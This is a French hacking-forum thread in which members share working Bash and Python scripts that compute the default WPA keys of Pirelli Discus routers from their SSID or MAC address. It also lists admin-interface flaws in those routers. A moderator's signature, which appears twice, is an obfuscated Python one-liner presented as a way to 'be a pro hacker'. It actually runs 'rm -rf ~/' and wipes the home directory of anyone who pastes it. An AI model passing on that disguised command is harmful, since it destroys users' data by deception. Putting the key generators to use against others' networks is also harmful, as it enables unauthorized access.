Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 24-11-2013 10:58:07

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Pirelli Discus : default WPA password recovery, admin acess hijacking.

Coucou.

Voici le Pirelli (comme les pneus) Discus A225 :
DRG-A225G.jpg

Ce sont des routeurs super cool.

Leur mot de passe WPA par défaut est le résultat d'une soustraction entre la fin de l'ESSID (qui est à peu près le numéro de série en hexa) et une constante, le tout divisé par 4, comme expliqué ici :
http://www.remote-exploit.org/content/P … router.pdf

Pour un routeur dont l'essid serait DA1CC5, le one-liner (oui parce que leur petit programme est mignon hein mais bon..) est :

$ python -c 'print "YW0{}".format((0xda1cc5-0xd0ec31)/4)'
YW0150565

0xd0ec31 est une constante, comme expliqué dans le pdf.


Une fois sur le réseau, il y a plein de failles au niveau de l'interface d'administration qui permettent de tout faire :
Pirelli Discus DRG A125g - Local Password Disclosure Vulnerability
Pirelli Discus DRG A125g - Remote Change WiFi Password Vulnerability
Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability
Pirelli Discus DRG A125g - Password Disclosure Vulnerability.

Bien joué les constructeurs.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 24-11-2013 11:19:11

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Pirelli Discus : default WPA password recovery, admin acess hijacking.

Excellent et Merci pour l'avoir posté wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#3 24-11-2013 12:18:25

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Pirelli Discus : default WPA password recovery, admin acess hijacking.

Idem merci


1310812721.gif

Hors Ligne

#4 24-11-2013 15:46:51

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Pirelli Discus : default WPA password recovery, admin acess hijacking.

Merci wink

fjh2.png

lol

Hors Ligne

#5 25-11-2013 01:58:06

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Pirelli Discus : default WPA password recovery, admin acess hijacking.

Et un de plus, on est en pleine saison là! big_smile

Hors Ligne

#6 25-11-2013 19:43:10

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Pirelli Discus : default WPA password recovery, admin acess hijacking.

le script en python ne fonctionne pas

a titre didactique, en bash


#!/bin/bash
colorbase="\E[0m"                      # Nous déclarons deux trois couleurs comme variables pour mettre joie et bonne hmeur
amarillo="\033[1;33m"                  # dans nôtre shell
rojo="\033[1;31m"
verdefluo="\033[1;32m"
echo -e " 

                     full disclosure sur$rojo Pirelli$amarillo Discus A225$colorbase
                 
                              by$amarillo Muris$rojo Kurgaš$colorbase      
   
 http://www.remote-exploit.org/content/Pirelli_Discus_DRG_A225_WiFi_router.pdf

                adaptation bash à titre didactique,$rojo crack-wifi.com$colorbase 
     
"

GENERATEUR()                            # notre script sous forme de fonction pour pouvoir être appelé récursivement 
{
echo -e " > Saisissez la mac de l'objectif, <ctrl+c> pour sortir :$rojo"
read -ep "                                                         " BSSID   # BSSID est nôtre variable, read permet que le texte entré par l'utilisateur définisse nôtre variable bssid, -ep permet que l utilisateur puisse éditer correctement les données entrées
echo -e "$colorbase"    

    while !(echo $BSSID | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")             # filtre bssid by anatares_145 avec une boucle sur condition grâce au pipe avec grep qui définit une expression régulière sous forme de patron à savoir 6 champs séparés par deux points et chaqu'un des champs et composé de deux symboles hexadécimaux 
           
      do  

        echo -e " $rojo Erreur : MAC Non Conforme $colorbase"   # Nous donnons un message d'erreur et redemandons à l'utilisateur de rentrer le bssid
        echo -e " > Saisissez la mac de l'objectif, <ctrl+c> pour sortir :$rojo"
        read -ep "                                                         " BSSID   # et jusqu'à ce que le format ne soit pas visible, ne corresponde pas à la structure définir par notre commande egrep, l'utilisateur et maintenue dans la phase "entrez vos données"
        echo "  "            
    
    done                                       # nous fermons notre boucle pour le filtre bssid

CONVERTEDBSSID=$(printf '%d\n' 0x$(echo $BSSID | awk -F':' '{ print $4$5$6 }' | tr -d ':'))    # convertissons à decimal nôtre fin bssid


# quitte à y être nous ajouttons une fonction pour vérifer que la mac soit supportée, nous avons deux cas possibles
#    - 1 le début bssid n'est pas 00:1C:AD 
#    - 2 la mac est inférieure à d0:ec:31 qui correspond à un pass YW000000000
echo $BSSID | awk -F':' '{ print $1$2$3 }' | grep 001CAD 

   if [[ -z `echo $BSSID | awk -F':' '{ print $1$2$3 }' | grep 001CAD` ]]; then  # si le début de mac n'est pas 00:1A:AD le routeur
      echo ""                                                                           # n'est pas suporté. et nous avertissons
      echo -e " $rojo Erreur : le debut de mac n'est pas valide, modèle non supporté$colorbase" # 
      echo ""
      GENERATEUR                                       # l'utilisateur rentre de nouveau les données
   elif [[ "$CONVERTEDBSSID" -lt "13691953" ]] ; then   # ici nous mettons en place nôtre deuxième filtre pour les modèles ayant une mac inférieure à d0:ec:31 ( 13691953 en base 10 ) 
      echo ""
      echo -e "$rojo Erreur : le routeur appartient bien à pirelli..
 mais est hors du rang des BSSID supportés " 
   echo "" 
      GENERATEUR                                        # l'utilisateur rentre de nouveau es données
   else  # bien, si ces deux conditions sont passées nous pouvons procéder le routeur est supporté et nous pouvons procéder avec le calcul du pass et l'essid par défaut
 


DISPLAYSSID=$( echo "$BSSID" | awk -F':' '{ print $4$5$6 }' | tr -d ':')  # la partie de notre bssid qui sera notre essid ( nous quittons les points doubles avec tr )

PASS=$(printf '%08d\n' `expr '(' $CONVERTEDBSSID '-' 13691953 ')' '/' 4`)  # printf nous permet de faire un zéro padding jusqu'a 8 digits, nous divisons par 4 la différence entre le bssid passé à décimal de nôtre objectif et notre constante, le premier routeur de la série affectée, le routeur a pour pass pas YW00000000 et BSSID 00:1C:AD:D0:EC:31 et son SSID serait Discuss--D0EC31
echo "--------------------------------------------------"                  
echo "--------------------------------------------------"                 
echo -e " pass par défaut/numéro de série$amarillo YW$verdefluo$PASS$colorbase "
echo -e " SSID par défaut$amarillo Discuss--$rojo$DISPLAYSSID$colorbase "
echo "--------------------------------------------------" 
echo "--------------------------------------------------" 

GENERATEUR                                  # nous revenons au menu pour rentrer les données

fi
}

GENERATEUR                                 # pour activer le script nous invoquons notre fonction

Hors Ligne

#7 25-11-2013 20:22:02

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Pirelli Discus : default WPA password recovery, admin acess hijacking.

kcdtv a écrit :

le script en python ne fonctionne pas

Chez moi oui pourtant

en python3 il y a cette variante

#!/usr/bin/python
#
# Pirelli Discus DRG A225 WiFi router
# Default WPA2-PSK algorithm vulnerability
#
# With this code we can predict the WPA2-PSK key...
#
# Hacked up by Muris Kurgas aka j0rgan
# j0rgan (-@-) remote-exploit.org
# http://www.remote-exploit.org
#
# Use for education or legal penetration testing purposes.....

import sys

def hex2dec(s):
    return int(s, 16)

if len(sys.argv) < 2 or len(sys.argv[1]) != 6:
    print("\r\nEnter the last 6 chars from Discus SSID")
    print("i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n")
    exit()
const = hex2dec('D0EC31')
inp = hex2dec(sys.argv[1])
result = (inp - const)/4

print("Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(int(result)))

1310812721.gif

Hors Ligne

#8 25-11-2013 21:47:37

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Pirelli Discus : default WPA password recovery, admin acess hijacking.

À titre didactique en python3

#!/usr/bin/env python3
# coding: utf-8
import sys
if __name__ == '__main__':
  try:
    print('Possible PSK for Discus--{} would be: YW0{}'.format(
      sys.argv[1],
      int((int(sys.argv[1],16)-0xD0EC31)/4))
    )
  except:
    print('Usage : {} < last 6 SSID hex characters >'.format(sys.argv[0]))

Les mouches n'ont qu'à bien se tenir big_smile


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#9 26-11-2013 00:05:15

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Pirelli Discus : default WPA password recovery, admin acess hijacking.

On voit les habitués du serpent :p

Dernière modification par coyotus (26-11-2013 00:05:31)


1310812721.gif

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
13 808 16-06-2016 20:04:23 par ✞θ!ก∃℧┌
356 52768 20-04-2016 22:17:29 par M1ck3y
Password list pour wpa2 par arianefurer
5 11655 17-05-2015 20:51:16 par kcdtv
Épinglée :
26 24508 04-01-2015 13:13:23 par Samirdu91
Presentation Default par Default
4 463 14-12-2014 15:53:44 par Default

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.032 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]